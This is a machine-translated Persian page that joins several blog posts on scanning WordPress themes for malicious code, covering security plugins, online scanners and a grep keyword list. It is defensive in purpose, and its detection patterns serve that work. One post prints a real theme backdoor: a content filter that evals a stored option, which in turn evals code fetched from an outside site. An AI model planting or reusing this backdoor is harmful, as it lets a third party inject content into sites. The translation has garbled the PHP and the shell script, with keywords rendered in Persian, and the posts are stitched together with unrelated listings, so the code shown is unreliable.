خانه - کامپیوترها
چگونه یک الگو را برای کدهای مخرب بررسی کنیم. پلاگین TAC یا نحوه بررسی یک قالب برای پیوندهای خارجی

وردپرس محبوب ترین موتور برای ایجاد وب سایت ها و وبلاگ های اطلاعاتی مختلف است. امنیت وب سایت شما بیشتر از امنیت داده های شماست. این بسیار مهمتر است، زیرا ایمنی همه کاربرانی است که منبع شما را می خوانند و به آن اعتماد دارند. به همین دلیل بسیار مهم است که سایت به ویروس یا هر کد مخرب دیگری آلوده نشود.

ما در یکی از مقالات زیر به نحوه محافظت از وردپرس در برابر هک شدن می پردازیم، اما اکنون می خواهم به شما بگویم که چگونه یک وب سایت وردپرس را برای ویروس ها و کدهای مخرب بررسی کنید تا مطمئن شوید که همه چیز ایمن است.

اولین گزینه ای که به ذهن می رسد این است که شما توسط هکرها هک شده اید و درهای پشتی آنها را در کد سایت خود قرار داده اید تا بتوانید اسپم ارسال کنید، لینک ها را قرار دهید و موارد بد دیگر. گاهی اوقات این اتفاق می افتد، اما اگر نرم افزار را به موقع به روز کنید، این یک مورد نسبتاً نادر است.

هزاران تم رایگان وردپرس و افزونه های مختلف وجود دارد، و این می تواند یک تهدید باشد. وقتی یک قالب را از سایت وردپرس دانلود می کنید یک چیز است و وقتی آن را در سایت سمت چپ پیدا می کنید چیز دیگری است. توسعه دهندگان بی پروا می توانند کدهای مخرب مختلفی را در محصولات خود جاسازی کنند. اگر قالب‌های ممتاز را به‌صورت رایگان دانلود کنید، خطر حتی بیشتر می‌شود، جایی که هکرها، بدون خطر کردن چیزی، می‌توانند نوعی حفره امنیتی اضافه کنند که از طریق آن نفوذ کرده و آنچه را که نیاز دارند انجام دهند. به همین دلیل است که بررسی یک سایت وردپرس برای ویروس ها بسیار مهم است.

بررسی یک سایت وردپرس برای ویروس

اولین چیزی که هنگام بررسی یک سایت باید به آن توجه کنید ویروس نیست، اینها افزونه های وردپرس هستند. به سرعت و به راحتی، می توانید سایت خود را اسکن کنید و قسمت های مشکوکی از کد را پیدا کنید که ارزش توجه به آن ها را دارند، خواه در قالب، افزونه یا هسته خود Wodpress باشند. بیایید به چند مورد از محبوب ترین افزونه ها نگاه کنیم:

1.TOC

این افزونه بسیار ساده تمام تم های نصب شده در سایت شما را بررسی می کند تا ببیند آیا حاوی کد مخرب هستند یا خیر. این افزونه پیوندهای مخفی رمزگذاری شده با استفاده از درج کد base64 را شناسایی می کند و همچنین اطلاعات دقیق در مورد مشکلات پیدا شده را نمایش می دهد. اغلب، کدهای یافت شده ویروس نیستند، اما به طور بالقوه می توانند خطرناک باشند، بنابراین باید به آنها توجه کنید.

باز کن "ظاهر" -> "TAC"سپس صبر کنید تا همه موضوعات بررسی شوند.

2. اسکنر VIP

بسیار شبیه به اسکنر موضوع TOC است، اما اطلاعات دقیق تری را نمایش می دهد. قابلیت های مشابه برای شناسایی لینک ها، کدهای مخفی و سایر درج های مخرب. کافیست آیتم VIP Scanner را در قسمت ابزار باز کنید و نتیجه را تحلیل کنید.

ممکن است کافی باشد فایل های غیر ضروری را حذف کنید، مثلا desktop.ini. یا باید با جزئیات بیشتری به اتفاقاتی که در فایل ها با استفاده از base64 می افتد نگاه کنید.

3. ضد بدافزار از GOTMLS.NET

این افزونه به شما این امکان را می دهد که نه تنها تم ها و هسته سایت را برای ویروس ها اسکن کنید، بلکه از سایت در برابر رمزهای عبور brute force و حملات مختلف XSS، SQLInj نیز محافظت کنید. جستجو بر اساس امضاها و آسیب پذیری های شناخته شده انجام می شود. برخی از آسیب پذیری ها را می توان در سایت رفع کرد. برای شروع اسکن فایل ها را باز کنید "ضد مالوار"در منوی کناری کلیک کنید "اجرای اسکن":

قبل از اینکه بتوانید اسکن را اجرا کنید، باید پایگاه داده امضای خود را به روز کنید.

4. Wordfence

این یکی از محبوب ترین افزونه ها برای امنیت وردپرس و اسکن بدافزار است. علاوه بر اسکنر، که می‌تواند بیشتر بوکمارک‌ها را در کد وردپرس پیدا کند، محافظت دائمی در برابر انواع مختلف حملات و نیروی بیرحمانه رمز عبور وجود دارد. افزونه در حین جستجو مشکلات احتمالی افزونه ها و تم های مختلف را پیدا کرده و نیاز به به روز رسانی وردپرس را گزارش می دهد.

برگه را باز کنید "WPDefence"در منوی کناری و سپس به تب بروید "اسکن"و فشار دهید "شروع اسکن":

اسکن ممکن است کمی طول بکشد، اما پس از تکمیل، گزارش مفصلی از مشکلات پیدا شده را مشاهده خواهید کرد.

5. آنتی ویروس

این افزونه ساده دیگری است که قالب وب سایت شما را برای کدهای مخرب اسکن می کند. نقطه ضعف این است که فقط الگوی فعلی اسکن می شود، اما اطلاعات با جزئیات کافی نمایش داده می شود. شما تمام عملکردهای خطرناکی را که در موضوع هستند مشاهده خواهید کرد و سپس می توانید با جزئیات تجزیه و تحلیل کنید که آیا آنها خطری دارند یا خیر. یک مورد پیدا کنید "آنتی ویروس"در تنظیمات و سپس کلیک کنید "اکنون الگوهای تم را اسکن کنید":

6. بررسی کننده صداقت

همچنین توصیه می شود که یکپارچگی فایل های وردپرس را بررسی کنید، در صورتی که ویروس قبلاً در جایی نوشته شده است. برای این کار می توانید از افزونه Integrity Checker استفاده کنید. تمام فایل های هسته، افزونه و قالب را برای تغییرات بررسی می کند. در پایان اسکن، اطلاعاتی در مورد فایل های تغییر یافته مشاهده خواهید کرد.

خدمات آنلاین

همچنین چندین سرویس آنلاین وجود دارد که به شما امکان می دهد یک سایت وردپرس را برای ویروس ها بررسی کنید یا فقط الگو را بررسی کنید. در اینجا به برخی از آنها اشاره می کنیم:

themecheck.org- شما آرشیو تم را دانلود می کنید و می توانید تمام هشدارهای مربوط به عملکردهای مخرب احتمالی استفاده شده در آن را مشاهده کنید. شما نه تنها می توانید اطلاعات مربوط به موضوع خود را مشاهده کنید، بلکه می توانید سایر تم های آپلود شده توسط کاربران دیگر و همچنین نسخه های مختلف تم را مشاهده کنید. هرچه افزونه ها پیدا کنند می توانند توسط این سایت پیدا شوند. بررسی قالب وردپرس نیز بسیار مهم است.

virustotal.com- یک منبع شناخته شده که می توانید وب سایت یا فایل قالب خود را برای ویروس ها بررسی کنید.

ReScan.pro- اسکن یک سایت وردپرس برای ویروس ها با استفاده از این سرویس رایگان است؛ تجزیه و تحلیل استاتیک و پویا برای شناسایی تغییر مسیرهای احتمالی انجام می شود؛ اسکنر صفحات سایت را باز می کند. سایت را در برابر لیست های سیاه مختلف بررسی می کند.

sitecheck.sucuri.net- یک سرویس ساده برای اسکن سایت ها و موضوعات برای ویروس ها. یک افزونه برای وردپرس وجود دارد. لینک ها و اسکریپت های خطرناک را شناسایی می کند.

بررسی دستی

هیچ چیز نمی تواند بهتر از بررسی دستی باشد. لینوکس دارای این ابزار شگفت انگیز grep است که به شما امکان می دهد تا برای یافتن رشته های دلخواه در یک پوشه با فایل ها جستجو کنید. باقی مانده است که بفهمیم به دنبال چه چیزی خواهیم بود:

eval - این تابع به شما امکان می دهد کدهای PHP دلخواه را اجرا کنید، توسط محصولاتی که به خود احترام می گذارند استفاده نمی شود؛ اگر یکی از پلاگین ها یا موضوعی از این تابع استفاده کند، تقریباً 100٪ احتمال دارد که حاوی ویروس باشد.

  • base64_decode- توابع رمزگذاری را می توان همراه با eval برای پنهان کردن کدهای مخرب استفاده کرد، اما می توان از آنها برای اهداف صلح آمیز نیز استفاده کرد، بنابراین مراقب باشید.
  • sha1- روش دیگری برای رمزگذاری کدهای مخرب؛
  • gzinflate- تابع فشرده سازی، اهداف مشابه، همراه با eval، به عنوان مثال، gzinflate(base64_decode(code);
  • strrev- خط را نه قبل از آن به عقب می چرخاند، زیرا می توان از گزینه ای برای رمزگذاری اولیه استفاده کرد.
  • چاپ- خروجی اطلاعات به مرورگر، همراه با gzinflate یا base64_decode خطرناک است.
  • file_put_contents- خود وردپرس یا افزونه ها همچنان می توانند فایل ها را در سیستم فایل ایجاد کنند، اما اگر موضوع این کار را انجام می دهد، باید مراقب باشید و بررسی کنید که چرا این کار را انجام می دهد، زیرا ویروس ها می توانند نصب شوند.
  • file_get_contents- در بیشتر موارد برای اهداف صلح آمیز استفاده می شود، اما می توان از آن برای دانلود کدهای مخرب یا خواندن اطلاعات از فایل ها استفاده کرد.
  • حلقه- همان داستان؛
  • باز کردن- فایلی را برای نوشتن باز می کند، شما هرگز نمی دانید برای چه هدفی.
  • سیستم- این تابع دستوری را در یک سیستم لینوکس اجرا می کند، اگر خود یک تم، افزونه یا وردپرس این کار را انجام دهد، به احتمال زیاد یک ویروس در آنجا وجود دارد.
  • پیوند نمادین- پیوندهای نمادین را در سیستم ایجاد می کند، شاید ویروس در تلاش است تا سیستم فایل اصلی را از خارج در دسترس قرار دهد.
  • کپی 🀄- یک فایل را از یک مکان به مکان دیگر کپی می کند.
  • getcwd- نام دایرکتوری کاری فعلی را برمی گرداند.
  • cwd- پوشه کاری فعلی را تغییر می دهد.
  • ini_get- اطلاعاتی در مورد تنظیمات PHP دریافت می کند، اغلب برای اهداف صلح آمیز، اما شما هرگز نمی دانید.
  • error_reporting(0)- خروجی هر پیام خطا را غیرفعال می کند.
  • window.top.location.href- تابع جاوا اسکریپت که برای تغییر مسیر به صفحات دیگر استفاده می شود.
  • هک شده است- بنابراین، فقط در مورد، ما چک می کنیم، ناگهان، خود هکر تصمیم گرفت به ما بگوید.

می توانید هر کلمه را با دستوری مانند زیر جایگزین کنید:

grep -R "هک شده" /var/www/path/to/files/wordpress/wp-content/

یا از یک اسکریپت ساده استفاده کنید که همه کلمات را همزمان جستجو می کند:

values="base64_decode(
eval(base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr(ord(
cwd
ini_get
window.top.location.href
کپی 🀄(
ارزشیابی(
سیستم(
پیوند نمادین(
error_reporting(0)
چاپ
file_get_contents(
file_put_contents(
فوپن(
هک شده"

سی دی /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --include \*.php "$values" *

سلام دوستان. آیا مطمئن هستید که قالب رایگان وردپرسی که برای وب سایت ها و وبلاگ های خود استفاده می کنید واقعاً ایمن است و حاوی تهدیدات پنهان یا کد مخرب نیست؟ آیا در این مورد کاملاً مطمئن هستید؟ کاملا؟)

شما فکر می کنید که قالب را اجرا کرده اید، پیوندهای مخفی را از آن حذف کرده اید و کار تمام شده است. شما به صورت دوره ای فایل های سایت را با یک آنتی ویروس اسکن می کنید، به ابزارهای وب مستر Yandex در برگه امنیت نگاه می کنید و از دیدن پیام در آنجا راحت می شوید: هیچ کد مخربی در سایت شناسایی نشد«.

من هم همین فکر را کردم. دوست ندارم ناراحتت کنم اما...

کد خطرناک مخفی در قالب های رایگان وردپرس

این نامه ای است که هفته گذشته از طریق ایمیل از شرکت میزبان خود دریافت کردم. اخیراً آنها برای جستجوی محتوای مخرب همه فایل های سایت را به طور منظم بررسی کرده اند و این محتوا را در من پیدا کردند!

همه چیز از زمانی شروع شد که یک روز بعدازظهر به وب‌سایت خود رفتم و نتوانستم آن را راه‌اندازی کنم - یک پیام توهین‌آمیز درباره فایل‌هایی با پسوند php پیدا نشد. با کمی تنش، رفتم تا محتویات پوشه را با سایت موجود در هاست مطالعه کنم و بلافاصله مشکلی را کشف کردم - فایل قالب من fuctions.php به functions.php.malware تغییر نام داد که به نظر می رسید به طور مبهم اشاره می کند - یک آنتی ویروس وجود داشت. اینجا کار می کنم یا چیزی شبیه به آن) با مراجعه به نامه، گزارش فوق را از میزبان پیدا کردم.

البته اولین کاری که انجام دادم شروع به بررسی این فایل، مطالعه محتوای آن، اسکن آن با انواع آنتی ویروس ها، ده ها سرویس آنلاین ویروس یابی و غیره بود. - در پایان، چیزی پیدا نشد، همه به اتفاق آرا اظهار داشتند که پرونده کاملاً ایمن است. البته من شکم را به میزبان اعلام کردم و گفتم شما چیزی را به هم ریخته اید، اما در هر صورت از آنها خواستم گزارشی مبنی بر شناسایی کد مخرب ارائه دهند.

و این همان چیزی بود که آنها به من پاسخ دادند

من به اطلاعات این کد در گوگل رفتم و جدی فکر کردم ...

چگونه یک قطعه کد مخرب را در قالب پیدا کنیم

همانطور که مشخص است، این یک تکنیک واقعاً غیر ضروری است که به افراد علاقه مند اجازه می دهد تا داده ها را به سایت شما منتقل کنند و محتوای صفحات را بدون اطلاع شما تغییر دهند! اگر از یک قالب رایگان استفاده می کنید، پس من به شدت توصیه می کنم برای کد زیر، functions.php خود را بررسی کنید:

add_filter('the_content', '_bloginfo', 10001);
تابع _bloginfo($content)(
جهانی $post;
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false)(
بازگشت $co;
) در غیر این صورت $content را برگردانید.
}

حتی با دانش بسیار سطحی من از PHP، واضح است که یک فیلتر خاص در حال ایجاد است، که به متغیر جهانی پست و محتوا گره خورده است، که وظیفه نمایش محتوا را فقط در صفحات پست وبلاگ دارند (شرط is_single). از قبل مشکوک است، نه؟ خوب، حالا بیایید ببینیم این کد قرار است چه چیزی را در وب سایت ما نمایش دهد.

گزینه جالب blogoption درخواست شده در پایگاه داده نیز بسیار مشکوک به نظر می رسد. ما به پایگاه داده MySQL خود می رویم و جدولی به نام wp_options را در آنجا پیدا می کنیم، اگر پیشوندها را تغییر نداده باشید، به طور پیش فرض به این شکل خواهد بود. و در آن خطی را پیدا می کنیم که مورد علاقه ما است به نام blogoption

چه زیبایی! گزینه زیر را مشاهده می کنیم


return eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));

آن ها از یک سایت خاص (و یک سایت روسی، توجه داشته باشید) آنها محتوایی را برمی گردانند که می تواند حاوی هر چیزی باشد! هر تعداد پیوند، کدهای مخرب، متن تغییر یافته و غیره. وقتی به خود سایت دسترسی پیدا می کنید، خطای دسترسی 403 به شما می دهد که جای تعجب نیست. البته این گزینه رو هم از دیتابیس حذف کردم.

طبق اطلاعات قربانیان، محتوای دقیق مقاله شما معمولاً تنها با یک تغییر - به جای هر نقطه "، برگردانده می شود. یک لینک باز در متن پنهان شده بود! ضمناً این گزینه در هنگام نصب خود قالب در پایگاه داده نوشته می شود و سپس کدی که این کار را با موفقیت انجام می دهد خود تخریب می شود. و من دو سال با چنین آشغالی زندگی کردم و در تمام این مدت حتی یک آنتی ویروس یا سرویس این تهدید را برای من شناسایی نکرد. صادقانه بگویم، من متوجه نشدم که آیا این ترفند تا به حال برای من کار می کند یا اینکه افزونه امنیتی من این ویژگی را مسدود کرده است (یا شاید یکی از به روز رسانی های وردپرس این حفره را بسته باشد)، اما هنوز هم ناخوشایند است.

اخلاق در مورد پنیر رایگان

پیچیدگی "مترجمان" الگوهای ما (یا کسانی که آنها را در کاتالوگ خود پست می کنند) چگونه دوست دارید؟ این برای شما نیست که پیوندها را از پاورقی قطع کنید) حیف است که یادم نیست قالبم را از کجا دانلود کردم، خیلی وقت پیش بود، وگرنه قطعاً یک دوتای محبت آمیز می نوشتم. و اگر در آن زمان همان تجربه ای را داشتم که الان دارم، قطعاً از یک قالب رایگان استفاده نمی کردم یا در موارد شدید، آن را از منابع ناشناس دانلود نمی کردم!

با دانستن این که هیچ حفره یا لینک رمزگذاری شده ای در آن وجود ندارد، خرید یک قالب رسمی با قیمت 15 تا 20 دلار آسان تر است و در آرامش زندگی می کنید، و حتی اگر آسیب پذیری وجود داشته باشد، توسعه دهندگان قطعا به روز رسانی را منتشر می کنند که در آن این حفره ها وجود خواهد داشت. بسته ( به هر حال ، آرتم اخیراً مقاله ای منتشر کرده است که در آن در مورد قالب های برتر صحبت می کند و حتی کدهای تبلیغاتی را برای تخفیف های بی رحمانه برای علاقه مندان ارائه می دهد.)

سلام دوستان IdeaFox!

من شما را نمی دانم، اما من شب ها برای خوابیدن مشکل دارم. من از مسائل امنیتی وبلاگ عذاب می کشم. من دیگه قدرت ندارم :-)

من تعداد زیادی وبلاگ در این زمینه خواندم و پلاگین های زیادی را آزمایش کردم که به حل این مشکل کمک می کند. و در نظرات آنها شروع به پرسیدن سؤالاتی در مورد موضوع محافظت از سایت کردند که باعث شد من این یادداشت را بنویسم.

فقط تصور کنید که وبلاگ دارید، مقاله می نویسید، تلاش می کنید... و احمق های شیطانی می آیند و سایت شما را می شکنند. من فکر می کنم غم و اندوه زیادی وجود خواهد داشت.

از این گذشته، هر وبلاگ نویس عادی زمان و تلاش زیادی را برای توسعه وب سایت خود صرف می کند. و برای بسیاری، وبلاگ نویسی به طور کلی به یک وسواس تبدیل می شود... اینجا و تا زمانی که این اتفاق بیفتد :-)

خوب، می فهمید که این چقدر مهم است.

بلاخره بریم سر کار :)

چند ماه پیش قبلاً یادداشتی در مورد هک نوشتم. حتما بخوانید. اما زمان زیادی از آن زمان گذشته است و من اقدامات اضافی برای تقویت دفاع همه جانبه انجام دادم.

در یادداشت های بعدی قطعاً به تفصیل به این موضوع خواهم پرداخت. (تنظیمات ISP را هم یادم می آید و می نویسم)

3. سایت را در سایر خدمات آنلاین بررسی کنید

هیچ کمبودی در چنین خدماتی وجود ندارد. من معتقدم که بسیاری از آنها کاملاً احمقانه هستند و صرفاً برای نمایش تبلیغات ایجاد شده اند.

دکتر وب

شرکت DR.Web خدمات خوبی برای بررسی آنلاین سایت ها ارائه کرده است. شخصاً، او یک بار به من کمک کرد تا یک عفونت در وبلاگ یکی از دوستانم پیدا کنم (کد شخص ثالث در فایل htaccess. وجود داشت)

چک بسیار ساده است. URL خود را وارد کنید و منتظر نتیجه تأیید باشید.

antivirus-alarm.ru

یک اسکنر وب سایت قدرتمند که از 43 پایگاه داده آنتی ویروس از شرکت های مطرح آنتی ویروس در جهان استفاده می کند.

اینجا هم همه چیز خیلی ساده است. آدرس سایت خود را وارد می کنیم و با نفس حبس منتظر نتایج اسکن می شویم.

من منتظر اینها بودم

همه چیز تمیز است، شما می توانید آرام بخوابید :-)

البته همه اینها خوب است، اما شما همچنین باید چند افزونه را نصب کنید که برای وبلاگ های وردپرس به هیچ وجه ضرری ندارند.

4. از میزبان خود بخواهید تا سایت شما را بررسی کند

واقعیت این است که میزبان ها حتی بیشتر از شما نگران مسائل امنیتی هستند و اقدامات امنیتی قدرتمندی دارند. علاوه بر این، با وسایل حفاظتی تخصصی.

این خبری است که امروز برای شما دارم. در مرحله بعد، من در مورد یک افزونه بسیار قدرتمند به شما خواهم گفت که می تواند به طور قابل توجهی از وبلاگ وردپرس شما در برابر هک محافظت کند.

من قبلاً 2 ماه است که با او کار کردم و از او بسیار راضی هستم. در حالی که فهمیدم 3 بار خودمو تحریم کردم: –) خلاصه یه چیزی هست که بگم.

یکی از مهمترین مراحل ایجاد وبلاگ، انتخاب یک قالب با کیفیت بالا است. سایت های زیادی وجود دارد، چه پولی و چه رایگان. با این حال، در اینجا باید مراقب باشید، زیرا احتمال دریافت ویروس ها، اسکریپت های مخرب و لینک های مخفی همراه با فایل وجود دارد.

اما حتی اگر قالب از نظر امنیت تمیز باشد و از طراحی، قابلیت استفاده و عملکرد آن کاملا راضی باشید، این به این معنی نیست که همه چیز مرتب است. موضوع باید دارای کد HTML و CSS معتبر باشد و همچنین با تمام استانداردهای CMS وردپرس مطابقت داشته باشد.حتی تم های پولی و قالب های سفارشی ساخته شده با دومی مشکل دارند.

توسعه دهندگان موتور دائماً آن را توسعه می دهند و نویسندگان قالب همیشه با آنها همراه نیستند و از توابع قدیمی در هنگام ایجاد آنها استفاده می کنند.

امروز من به شما 2 راه برای بررسی تم های وردپرس برای مطابقت با استانداردها نشان خواهم داد. این ابزارها زمانی استفاده می شوند که به فهرست رسمی https://wordpress.org/themes/ اضافه می شوند.

سرویس بررسی تم های وردپرس و قالب های جوملا برای مطابقت با استانداردها

ThemeCheck.org یک سرویس رایگان است که به شما امکان می دهد قبل از نصب قالب ها در وب سایت خود، ایمنی و کیفیت قالب های CMS WordPress و Joomla را بررسی کنید.

برای بررسی یک طرح زمینه، بایگانی آن را با کلیک روی دکمه «انتخاب فایل» در themecheck.org از رایانه خود دانلود کنید. اگر نمی‌خواهید نتایج اسکن در سرویس ذخیره شود و در دسترس سایر کاربران قرار گیرد، « داده های آپلود شده را پس از نتایج فراموش کنید". اکنون روی دکمه "ارسال" کلیک کنید.

مثلا تاپیک رو گرفتم رابط، که از وب سایت رسمی دانلود کردم. 99 از 100 – 0 خطای حیاتی و 1 هشدار. این یک نتیجه بسیار خوب است.

در مقایسه، الگوی وبلاگ من نمره 0 (14 خطا و 23 هشدار) دریافت کرد. من فکر می کنم که برای بسیاری نتایج تفاوت چندانی نخواهد داشت، به خصوص اگر موضوعات قبلاً قدیمی شده باشند. تمام یادداشت ها با توضیحات، نشان دهنده فایل ها و خطوطی که در آن یافت شده اند در همان صفحه زیر قرار دارند.

صادقانه بگویم، من چیز زیادی در آنجا نفهمیدم؛ برای نویسندگان مفیدتر است، و تغییر قالب برای من آسان تر از اصلاح همه چیز است. من فقط نمی دانم چه زمانی تصمیم به انجام این کار خواهم گرفت.

در صفحه اصلی مجموعه بزرگی از تم های وب وردپرس و جوملا قبلاً آزمایش شده با قابلیت مرتب سازی بر اساس زمان اضافه شده یا رتبه بندی وجود دارد. وقتی روی آنها کلیک می کنید، می توانید اطلاعات دقیق و پیوندهایی به وب سایت نویسنده و صفحه دانلود را مشاهده کنید.

اگر شما یک توسعه دهنده هستید و قالب شما 100% معتبر است، می توانید با نصب یک نشان ویژه با یک امتیاز روی آن، کاربران را در این مورد مطلع کنید.

ارزش سرویس ThemeCheck.org این است که هر مدیر وب سایت می تواند از آن برای انتخاب یک تم با کیفیت بالا قبل از نصب آن در وبلاگ استفاده کند.

افزونه بررسی تم

می توانید با استفاده از افزونه Theme Check یک قالب از قبل نصب شده را برای سازگاری با آخرین استانداردهای وردپرس بررسی کنید. لینک دانلود آخرین نسخه: https://wordpress.org/plugins/theme-check/

عملکرد افزونه مشابه سرویسی است که در بالا توضیح دادم. پس از نصب و فعال سازی استاندارد، نیازی به انجام تنظیمات نیست. روش بررسی:

  1. به پنل مدیریت به صفحه منو "ظاهر" - "بررسی تم" بروید.
  2. اگر چندین تم را نصب کرده اید، از لیست کشویی، تم مورد نظر را انتخاب کنید.
  3. اگر نمی‌خواهید اطلاعات ارسال شود، کادر انتخاب «Suppress INFO» را علامت بزنید.
  4. روی دکمه «بررسی کنید» کلیک کنید.

نتایج در همان صفحه نشان داده خواهد شد.

همانطور که می بینید، موضوع استاندارد بیست و دههمچنین ایده آل نیست، اما، برای مثال، دوهزار و چهاردههیچ خطایی ندارد

پس از بررسی، می توان افزونه را غیرفعال کرد، یا بهتر است بگوییم، تا دفعه بعد به طور کامل حذف شود.

نتیجه.قبل از نصب یک قالب جدید وردپرس، آن را نه تنها برای پیوندهای مخفی و کدهای مخرب با افزونه TAC، بلکه با سرویس ThemeCheck.org یا افزونه Theme Check برای مطابقت با آخرین استانداردهای CMS بررسی کنید.

P.S.اخیراً، هنگام مرور TopSape Reader، یک وبلاگ جدید SEO zenpr.ru را دیدم که از نظر کلیک در ماه جایگاه اول را در بین وبلاگ نویسان دارد. با توجه به اینکه او کمی بیش از یک ماه سن دارد، نتیجه قابل احترام است. طراحی به سبک مینیمالیسم است، اگر نگوییم که اصلا وجود ندارد، اما نویسنده می نویسد - شما آن را خواهید خواند. همه به نقطه و بدون آب. درست مانند عنوان وبلاگ - "صفر کاراکتر اضافی". خواندن آن را توصیه می کنم، اطلاعات مفید زیادی پیدا خواهید کرد.



 


خواندن:



منوی سمت چپ cayo coco را باز کنید

منوی سمت چپ cayo coco را باز کنید

جزیره کایو کوکو یک جزیره تفریحی در مرکز کوبا است. موقعیت جزیره جزیره کایو کوکو دقیقا روبروی کانال ویجو در...

چرا به ارتباطات رادیویی و ایستگاه های رادیویی نیاز داریم؟

چرا به ارتباطات رادیویی و ایستگاه های رادیویی نیاز داریم؟

برخی از مردم رویای یک آیفون جدید، برخی دیگر یک ماشین و برخی دیگر مجموعه ای از قطعات و بلندگوی جدید رادیوی خود را در سر می پرورانند. زمانی نه چندان دور بود که ...

ضرایب همبستگی رتبه کندال و اسپیرمن مثال ضریب همبستگی رتبه کندال

ضرایب همبستگی رتبه کندال و اسپیرمن مثال ضریب همبستگی رتبه کندال

ارائه و پردازش مقدماتی ارزیابی های کارشناسی در عمل از چندین نوع ارزیابی استفاده می شود: - کیفی (اغلب به ندرت، ...

توابع برنامه نویسی

توابع برنامه نویسی

هدف کار: 1) قوانین توصیف توابع را مطالعه کنید. 2) کسب مهارت در استفاده از توابع هنگام نوشتن برنامه در C++. نظری...

فید-تصویر RSS